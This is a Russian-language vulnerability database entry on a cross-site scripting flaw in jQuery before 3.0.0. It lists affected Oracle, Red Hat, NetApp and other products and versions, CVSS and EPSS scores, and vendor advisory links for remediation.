Описание
Уязвимость библиотеки jQuery связана с непринятием мер по защите структуры веб-страницы. Эксплуатация уязвимости может позволить нарушителю, действующему удаленно, выполнить межсайтовый скриптинг с помощью междоменных ajax-запросов
Вендор
Oracle Corp.
Novell Inc.
The jQuery Foundation
NetApp Inc.
AVEVA Software, LLC
Red Hat Inc.
dotCMS LLC
Сообщество свободного программного обеспечения
Ruby Team
Наименование ПО
Enterprise Manager Ops Center
Fusion Middleware MapViewer
Business Process Management Suite
JD Edwards EnterpriseOne Tools
Primavera Unifier
Hospitality Reporting and Analytics
WebCenter Sites
Oracle JDeveloper
Communications Converged Application Server
Communications WebRTC Session Controller
OpenSUSE Leap
Oracle Hospitality Guest Access
Primavera Gateway
Oracle Hospitality Materials Control
Oracle Service Bus
Oracle Healthcare Translational Research
Oracle Retail Customer Insights
Financial Services Analytical Applications Infrastructure
Financial Services Funds Transfer Pricing
Oracle Endeca Information Discovery Studio
Banking Platform
Oracle Retail Invoice Matching
Oracle Hospitality Cruise Fleet Management
jQuery
NetApp SolidFire & HCI Storage Node
InTouch Access Anywhere
Red Hat Data Grid
Red Hat JBoss A-MQ
Red Hat JBoss Fuse
dotCMS
RetireJS
Ruby
Agile Product Lifecycle Management for Process
Communications Interactive Session Recorder
Communications Services Gatekeeper
Enterprise Operations Monitor
Financial Services Data Integration Hub
Financial Services Asset Lliability Management
Financial Services Hedge Management and Ifrs valuations
Financial Services Liquidity Risk Management
Financial Services Loan Loss Forecasting and Provisioning
Financial Services Market Risk Measurement and Management
Financial Services Profitability Management
Financial Services Reconciliation Framework
Oracle Healthcare Foundation
Insurance Insbridge Rating and Underwriting
OSS Support Tools
Oracle PeopleSoft Enterprise PeopleTools
Oracle Real-Time Scheduler
Retail Allocation
Oracle Retail Sales Audit
Retail Workforce Management Software
Siebel UI Framework
Oracle Utilities Framework
Oracle Utilities Mobile Workforce Management
Версия ПО
12.2.2 (Enterprise Manager Ops Center)
12.3.3 (Enterprise Manager Ops Center)
12.2.1.3.0 (Fusion Middleware MapViewer)
11.1.1.9.0 (Business Process Management Suite)
12.1.3.0.0 (Business Process Management Suite)
12.2.1.3.0 (Business Process Management Suite)
9.2 (JD Edwards EnterpriseOne Tools)
16.2 (Primavera Unifier)
16.1 (Primavera Unifier)
от 17.1 до 17.12 включительно (Primavera Unifier)
9.1 (Hospitality Reporting and Analytics)
11.1.1.8.0 (WebCenter Sites)
12.2.1.3.0 (WebCenter Sites)
12.1.3.0.0 (Oracle JDeveloper)
12.2.1.3.0 (Oracle JDeveloper)
до 7.0.0.1 (Communications Converged Application Server)
до 7.2 (Communications WebRTC Session Controller)
15.1 (OpenSUSE Leap)
4.2.0 (Oracle Hospitality Guest Access)
4.2.1 (Oracle Hospitality Guest Access)
18.8 (Primavera Unifier)
15.2 (Primavera Gateway)
16.2 (Primavera Gateway)
17.12 (Primavera Gateway)
18.1 (Oracle Hospitality Materials Control)
12.1.3.0.0 (Oracle Service Bus)
12.2.1.3.0 (Oracle Service Bus)
3.1.0 (Oracle Healthcare Translational Research)
15.0 (Oracle Retail Customer Insights)
16.0 (Oracle Retail Customer Insights)
от 7.3.3 до 7.3.5 включительно (Financial Services Analytical Applications Infrastructure)
от 8.0.4 до 8.0.7 включительно (Financial Services Funds Transfer Pricing)
3.2.0 (Oracle Endeca Information Discovery Studio)
2.6.0 (Banking Platform)
2.6.1 (Banking Platform)
2.6.2 (Banking Platform)
11.1.1.9.0 (Oracle JDeveloper)
15.0 (Oracle Retail Invoice Matching)
9.0.11 (Oracle Hospitality Cruise Fleet Management)
до 3.0.0 (jQuery)
- (NetApp SolidFire & HCI Storage Node)
до 2017 Update 2 (InTouch Access Anywhere)
7.3.5 (Red Hat Data Grid)
6.3 R15 (Red Hat JBoss A-MQ)
6.3 R15 (Red Hat JBoss Fuse)
5.1.1 (dotCMS)
- (RetireJS)
2.5 (Ruby)
6.2.0.0 (Agile Product Lifecycle Management for Process)
6.2.1.0 (Agile Product Lifecycle Management for Process)
6.2.2.0 (Agile Product Lifecycle Management for Process)
6.2.3.0 (Agile Product Lifecycle Management for Process)
6.2.3.1 (Agile Product Lifecycle Management for Process)
6.0 (Communications Interactive Session Recorder)
6.1 (Communications Interactive Session Recorder)
6.2 (Communications Interactive Session Recorder)
3.1.0 (Oracle Endeca Information Discovery Studio)
до 6.1.0.4.0 (Communications Services Gatekeeper)
3.4 (Enterprise Operations Monitor)
4.0 (Enterprise Operations Monitor)
от 8.0.0 до 8.0.7 включительно (Financial Services Analytical Applications Infrastructure)
от 8.0.5 до 8.0.7 включительно (Financial Services Data Integration Hub)
от 8.0.4 до 8.0.7 (Financial Services Asset Lliability Management)
от 8.0.4 до 8.0.7 включительно (Financial Services Hedge Management and Ifrs valuations)
от 8.0.2 до 8.0.6 включительно (Financial Services Liquidity Risk Management)
от 8.0.2 до 8.0.7 включительно (Financial Services Loan Loss Forecasting and Provisioning)
8.0.5 (Financial Services Market Risk Measurement and Management)
8.0.6 (Financial Services Market Risk Measurement and Management)
от 8.0.4 до 8.0.6 включительно (Financial Services Profitability Management)
8.0.5 (Financial Services Reconciliation Framework)
8.0.6 (Financial Services Reconciliation Framework)
7.1 (Oracle Healthcare Foundation)
7.2 (Oracle Healthcare Foundation)
5.2 (Insurance Insbridge Rating and Underwriting)
5.4 (Insurance Insbridge Rating and Underwriting)
5.5 (Insurance Insbridge Rating and Underwriting)
19.1 (OSS Support Tools)
8.55 (Oracle PeopleSoft Enterprise PeopleTools)
8.56 (Oracle PeopleSoft Enterprise PeopleTools)
8.57 (Oracle PeopleSoft Enterprise PeopleTools)
2.3.0 (Oracle Real-Time Scheduler)
15.0.2 (Retail Allocation)
15.0 (Oracle Retail Sales Audit)
1.60.9 (Retail Workforce Management Software)
1.64.0 (Retail Workforce Management Software)
18.10 (Siebel UI Framework)
18.11 (Siebel UI Framework)
от 4.3.0.1 до 4.3.0.4 (Oracle Utilities Framework)
2.3.0 (Oracle Utilities Mobile Workforce Management)
12.1.3.0 (WebCenter Sites)
Тип ПО
Сетевое программное средство
Прикладное ПО информационных систем
Программное средство защиты
Операционная система
Программное средство АСУ ТП
ПО сетевого программно-аппаратного средства
Операционные системы и аппаратные платформы
Novell Inc. OpenSUSE Leap 15.1
Уровень опасности уязвимости
Средний уровень опасности (базовая оценка CVSS 2.0 составляет 6,4)
Средний уровень опасности (базовая оценка CVSS 3.0 составляет 6,1)
Возможные меры по устранению уязвимости
Использование рекомендаций:
Для программных продуктов NetApp Inc.:
https://security.netapp.com/advisory/ntap-20210108-0004/
Для jQuery;
https://snyk.io/vuln/npm:jquery:20150627
Для InTouch Access Anywhere:
https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04
Для программных продуктов Red Hat Inc.:
https://access.redhat.com/errata/RHSA-2020:0481
https://access.redhat.com/errata/RHSA-2020:0729
Для dotCMS:
https://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html
Для RetireJS:
https://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html
Для OctoberCMS:
https://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
Для openSUSE Leap и Ruby:
https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/message/ZJAMCVFC2KL342QI4W5HGYIZXTNBURQT/
Для программных продуктов Oracle Corp.:
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://www.oracle.com/security-alerts/cpuapr2020.html
https://www.oracle.com/security-alerts/cpujan2020.html
https://www.oracle.com/security-alerts/cpujul2020.html
https://www.oracle.com/security-alerts/cpuoct2020.html
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
Статус уязвимости
Подтверждена производителем
Наличие эксплойта
Данные уточняются
Информация об устранении
Уязвимость устранена
Ссылки на источники
Идентификаторы других систем описаний уязвимостей
- CVE
- ICSA
EPSS
Процентиль: 93%
0.09842
Низкий
6.1 Medium
CVSS3
6.4 Medium
CVSS2
Связанные уязвимости
CVSS3: 6.1
ubuntu
больше 7 лет назад
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CVSS3: 6.1
redhat
почти 10 лет назад
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CVSS3: 6.1
nvd
больше 7 лет назад
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
CVSS3: 6.1
debian
больше 7 лет назад
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attack ...
EPSS
Процентиль: 93%
0.09842
Низкий
6.1 Medium
CVSS3
6.4 Medium
CVSS2